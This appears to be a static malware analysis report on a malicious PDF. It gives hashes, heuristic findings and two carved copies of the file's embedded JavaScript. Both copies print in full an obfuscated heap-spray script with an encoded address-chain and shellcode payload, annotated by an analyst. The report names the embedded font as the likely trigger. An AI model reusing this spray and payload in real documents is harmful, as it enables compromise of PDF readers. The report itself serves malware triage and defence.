Malicious PDF — malware analysis report

Static analysis result for SHA-256 a5a009edfed7c4d5…

MALICIOUS

PDF

53.9 KB First seen: 2026-05-10
MD5: 335698f9211138d013cc6f2dc33d41a9 SHA-1: 060e5b21c92c95f18ddd15910e1362dfae054d6d SHA-256: a5a009edfed7c4d5e5e8e337425ab9cf3836bc3bdd6c8097f6cc9d8f1596ef7c
Risk score: 76

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics (5)

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action — low — 1 related finding — PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. The generic rule's "low" weight should not be read as the weight of this sample's script: the /JS stream the action points at (object 12, carved below) is a heap-spray routine, not form logic. Whether the action fires automatically (an /OpenAction or a page /AA entry) is not shown on this page and should be confirmed from the object tree.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form — low — PDF_XFA
    PDF uses XML Forms Architecture, which can carry script logic. In this sample the XFA stream (object 14, 435 bytes, visible in the carved listing below) is a minimal template — an empty `form1` subform with an empty page set and `<interactive>1</interactive>` — and contains no script. On its own it adds no scripted behaviour; it may, however, cause the reader to process the document through its XFA/form code path, which is worth noting alongside the JavaScript heap spray.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.bitstream.com — in PDF document text (not referenced by any script or link action; informational only)
    • http://ns.adobe.com/xdp/ — labelled "Referenced by PDF JavaScript"
    • http://www.xfa.org/schema/xci/2.6/ — labelled "Referenced by PDF JavaScript"
    • http://www.xfa.org/schema/xfa-template/2.6/ — labelled "Referenced by PDF JavaScript"
    Caveat on the last three: they are the XML namespace identifiers of the XFA stream (object 14, see the carved listing below), i.e. schema names, not endpoints the document contacts. The "Referenced by PDF JavaScript" label appears to come from the second JavaScript carve (javascript_obj0012_001.js) running past its stream and swallowing object 14; it should not be read as script-initiated network access. No URL is visible in the JavaScript previews themselves.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename — Kind — Source — Size
javascript_obj0012_000.js — pdf-javascript-stream — PDF /JS object 12 at offset 0xC3C2 — 4131 bytes (0xC3C2 = 50114, which is object 12's xref offset, so this carve begins at the object header)
SHA-256: 6e031d90b0b2e0ba23e3455c65583fc9978384d9c9f19802ba5e25df670ec42b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
7 of 11 identifiers look randomly generated (e.g. 'KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFN') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
// Stage 1 — decoder alias.
// `unescape` is bound to a random-looking name so that later calls never
// contain the literal token `unescape(` (name-mangling; see the obfuscation
// note above).
var sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm = unescape;
// Stage 2 — the payload.
// A %uXXXX-encoded blob decoded through the alias. It opens with two 0x4141
// units, then a run of values in the 0x4a80xxxx–0x4a8axxxx range interleaved
// with small constants (a layout consistent with a chain of addresses into one
// fixed module plus arguments — the module is not identifiable from this
// page), then six 0xffff units and 0x00001000, then bytes that begin with what
// looks like a fnstenv/pop GetPC sequence and an xor loop
// (d9 74 24 f4 5a b1 49 31 7a 19 ...), i.e. a self-decoding stub. The encoded
// body after the stub is not decoded here.
var fqbkvNqANRxxNhpOAicqLjbrRPhXisSalBiIHXqdWKffNiJrpXEdExkzVRZCrCpQDRxOWDouxQLJSZGtPFxkiO = sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ucedb%uf2bf%u7c14%u29bc%ud9c9%u2474%u5af4%u49b1%u7a31%u8319%ufcea%u7a03%u1015%u80e1%u5d54%u790a%u3da5%u9c82%u6f94%ud5f0%ubf85%ubb72%u3425%u28d6%u38bd%u5fff%uf676%u6ed9%u3787%u3de6%u564b%u3f9a%ub898%u8fa3%ub9ed%uf2e4%ueb1e%u79bd%u1b8c%u3cc9%u1a0d%u4b1d%u642d%u8c18%udeda%udd23%u5573%uc56b%u31f8%uf44c%u222d%ubfb0%u905a%u3e42%ue98b%u70ab%ua5f3%ubc95%ub4fe%u7bd2%uc3e1%u7828%ud39c%u02ea%u567a%ua5ef%uc009%u54cb%u96dd%u5b98%uddaa%u7fc7%u322d%u7b7c%ub5a6%u0d53%u91fc%u5577%ub8a6%u332e%uc509%u9b31%u63f6%u0e39%u15e2%u4760%u2bc7%u979b%u3c4f%ua5e8%u96d0%u8666%u3099%ue970%u84b3%u14ee%uf43c%ud327%ua468%uf25f%u2f10%ufba0%uffc4%u53f0%ubfb7%u13a0%u5767%u9bab%u4758%u71d4%uedf1%u122e%uf0f4%ud031%uf060%u0531%u7d2d%u4fd7%u2bdd%uf84f%u7644%u991b%uad89%u9961%u4102%u5495%u2ce3%u0185%u7b03%u84f7%u561c%u2892%u5c89%u7e35%u5e25%u4860%ua1ea%uc247%u3723%ubd28
%ud74b%u3da8%ubd1a%u55a8%ue5fa%u40fa%u3005%ud96f%uba90%u8dc6%ud233%ue8e4%u7d74%udf16%u4284%u26c1%ub203%u4b67%u41cf' );
// Stage 3 — 0x0c0c filler.
// "%u0c0c%u0c0c" is built from single-character pieces, presumably so the
// literal never appears in the stream. unescape turns it into two UTF-16 code
// units of 0x0c0c, i.e. the bytes 0c 0c 0c 0c.
var KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT = sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
// Double the filler until its length plus 28 would reach 65536; starting from
// 2 units it stops at exactly 65536 code units. The 20+8 allowance is
// apparently for a string header — the code does not say.
while (KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT.length + 20 + 8 < 65536) KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT+=KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT;
// Block layout: (0x0c0c - 0x24)/2 = 1524 filler units, then the payload, then
// the whole 65536-unit filler again. If 0x24 bytes of object header precede
// the string data, the payload starts 0x0c0c bytes into the allocation — the
// low 16 bits of 0x0c0c0c0c (the "heap spray 0x0C" indicator above) — so a
// jump or pivot to that address lands on the payload. Note these three
// assignments have no `var`: they create implicit globals.
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ = KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT.substring(0, (0x0c0c-0x24)/2);
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ += fqbkvNqANRxxNhpOAicqLjbrRPhXisSalBiIHXqdWKffNiJrpXEdExkzVRZCrCpQDRxOWDouxQLJSZGtPFxkiO;
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ += KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT;
// Cut the block to 32768 code units (64 KiB of UTF-16), then double it until
// it reaches 0x80000 units (1 MiB). The payload therefore recurs every 64 KiB
// inside each block.
AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj = fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ.substring(0, 65536/2);
while(AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj.length < 0x80000) AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj += AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj;
// Trim (0x1020 - 0x08)/2 = 0x80c units off the end — presumably allocator and
// string-header overhead so that each copy fits a 1 MiB allocation exactly.
oshaapSNvWOBFHQzxjquVObuJaxAEjpJFRubnwNjCkiouCiTiaeiaUQjBRv = AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj.substring(0, 0x80000 - (0x1020-0x08) / 2);
// Stage 4 — the spray: 0x1f0 = 496 copies (about 500 MiB in total). The "s"
// appended to each is presumably there to force a distinct string object per
// element rather than 496 references to the same one.
var udpOZDbyuVqBlzQD = new Array();
for (EVHMc=0;EVHMc<0x1f0;EVHMc++) udpOZDbyuVqBlzQD[EVHMc]=oshaapSNvWOBFHQzxjquVObuJaxAEjpJFRubnwNjCkiouCiTiaeiaUQjBRv+"s";
javascript_obj0012_001.js — pdf-javascript-stream — PDF /JS object 12 at offset 0xC3E4 — 5017 bytes
Caveat: this carve starts 0x22 (34) bytes after javascript_obj0012_000.js, and its preview continues past the script into `endstream`/`endobj`, objects 13–14 (the XFA stream), the xref table and the trailer. 0xC3E4 + 5017 = 55165, which is at about the end of the ~55 KB file, so the extra ~890 bytes over artifact 000 appear to be enclosing PDF structure rather than additional script. Treat the two artifacts as a single script; the trailing XFA XML in this one is the likely source of the namespace URLs attributed to "PDF JavaScript" in the EMBEDDED_URL finding above.
SHA-256: 08cfa4ccd4a9d6b478a13d7521a4776f36ec07e323b195957678ffc8f2621f10
Preview script
First 1,000 lines of the extracted script
// Second carve of the same /JS object (offset 0xC3E4, 0x22 bytes after the
// first). The script text is identical to javascript_obj0012_000.js; the
// notes below repeat the analysis so this artifact reads on its own.
// Stage 1 — decoder alias: `unescape` bound to a random-looking name so the
// literal token `unescape(` never appears in later calls.
var sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm = unescape;
// Stage 2 — the payload: a %uXXXX-encoded blob. Two 0x4141 units, then values
// in the 0x4a80xxxx–0x4a8axxxx range interleaved with small constants (layout
// consistent with a chain of addresses into one fixed module plus arguments;
// module not identifiable here), six 0xffff units, 0x00001000, then bytes that
// begin with what looks like a fnstenv/pop GetPC sequence and an xor loop
// (d9 74 24 f4 5a b1 49 31 7a 19 ...), i.e. a self-decoding stub. The encoded
// body after it is not decoded here.
var fqbkvNqANRxxNhpOAicqLjbrRPhXisSalBiIHXqdWKffNiJrpXEdExkzVRZCrCpQDRxOWDouxQLJSZGtPFxkiO = sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ucedb%uf2bf%u7c14%u29bc%ud9c9%u2474%u5af4%u49b1%u7a31%u8319%ufcea%u7a03%u1015%u80e1%u5d54%u790a%u3da5%u9c82%u6f94%ud5f0%ubf85%ubb72%u3425%u28d6%u38bd%u5fff%uf676%u6ed9%u3787%u3de6%u564b%u3f9a%ub898%u8fa3%ub9ed%uf2e4%ueb1e%u79bd%u1b8c%u3cc9%u1a0d%u4b1d%u642d%u8c18%udeda%udd23%u5573%uc56b%u31f8%uf44c%u222d%ubfb0%u905a%u3e42%ue98b%u70ab%ua5f3%ubc95%ub4fe%u7bd2%uc3e1%u7828%ud39c%u02ea%u567a%ua5ef%uc009%u54cb%u96dd%u5b98%uddaa%u7fc7%u322d%u7b7c%ub5a6%u0d53%u91fc%u5577%ub8a6%u332e%uc509%u9b31%u63f6%u0e39%u15e2%u4760%u2bc7%u979b%u3c4f%ua5e8%u96d0%u8666%u3099%ue970%u84b3%u14ee%uf43c%ud327%ua468%uf25f%u2f10%ufba0%uffc4%u53f0%ubfb7%u13a0%u5767%u9bab%u4758%u71d4%uedf1%u122e%uf0f4%ud031%uf060%u0531%u7d2d%u4fd7%u2bdd%uf84f%u7644%u991b%uad89%u9961%u4102%u5495%u2ce3%u0185%u7b03%u84f7%u561c%u2892%u5c89%u7e35%u5e25%u4860%ua1ea%uc247%u3723%ubd28
%ud74b%u3da8%ubd1a%u55a8%ue5fa%u40fa%u3005%ud96f%uba90%u8dc6%ud233%ue8e4%u7d74%udf16%u4284%u26c1%ub203%u4b67%u41cf' );
// Stage 3 — 0x0c0c filler, built from single-character pieces (presumably so
// the literal never appears in the stream); unescape yields two code units of
// 0x0c0c, i.e. bytes 0c 0c 0c 0c.
var KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT = sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
// Double the filler until length + 28 would reach 65536: from 2 units it stops
// at exactly 65536 code units. The 20+8 allowance is apparently a header
// reservation; the code does not explain it.
while (KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT.length + 20 + 8 < 65536) KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT+=KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT;
// Block layout: (0x0c0c - 0x24)/2 = 1524 filler units, the payload, then the
// full filler again. With 0x24 bytes of object header ahead of the string
// data the payload sits 0x0c0c bytes into the allocation — the low 16 bits of
// 0x0c0c0c0c — so a jump or pivot to that address lands on it. These three
// assignments lack `var` and so create implicit globals.
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ = KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT.substring(0, (0x0c0c-0x24)/2);
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ += fqbkvNqANRxxNhpOAicqLjbrRPhXisSalBiIHXqdWKffNiJrpXEdExkzVRZCrCpQDRxOWDouxQLJSZGtPFxkiO;
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ += KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT;
// Cut to 32768 code units (64 KiB), then double to 0x80000 units (1 MiB); the
// payload thus recurs every 64 KiB within each block.
AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj = fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ.substring(0, 65536/2);
while(AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj.length < 0x80000) AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj += AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj;
// Trim (0x1020 - 0x08)/2 = 0x80c units — presumably allocator/string-header
// overhead so each copy fits a 1 MiB allocation exactly.
oshaapSNvWOBFHQzxjquVObuJaxAEjpJFRubnwNjCkiouCiTiaeiaUQjBRv = AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj.substring(0, 0x80000 - (0x1020-0x08) / 2);
// Stage 4 — the spray: 0x1f0 = 496 copies (~500 MiB). The appended "s" is
// presumably there to force a distinct string object per element.
var udpOZDbyuVqBlzQD = new Array();
for (EVHMc=0;EVHMc<0x1f0;EVHMc++) udpOZDbyuVqBlzQD[EVHMc]=oshaapSNvWOBFHQzxjquVObuJaxAEjpJFRubnwNjCkiouCiTiaeiaUQjBRv+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000054297 00000 n
0000054330 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54816
%%EOF
font_00_sfnt_off0000032f.bin — pdf-font-stream — PDF embedded font (sfnt) at offset 0x32F — 49224 bytes (0x32F = 815 lies inside object 10, whose xref offset is 766 with object 11 at 50057; 815 + 49224 = 50039 fits, so this appears to be object 10's stream)
SHA-256: da52c77f649d798f3577c709d0087aefd51a65b6a7c0fe9716661eccd392e249
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C.
Reviewer note: at 49,224 bytes this one embedded font is roughly 90% of the 53.9 KB sample, and the JavaScript in object 12 only stages a heap spray with no visible trigger of its own. The font stream is therefore the most likely carrier of the actual trigger and deserves dedicated sfnt parsing (table directory, table lengths and offsets, malformed entries) rather than a generic shellcode scan. The "heap spray 0x0C" hit on font data may be coincidental — runs of 0x0C can occur in ordinary binary data — and should be confirmed by inspecting the flagged region offsets before it is counted as a second spray.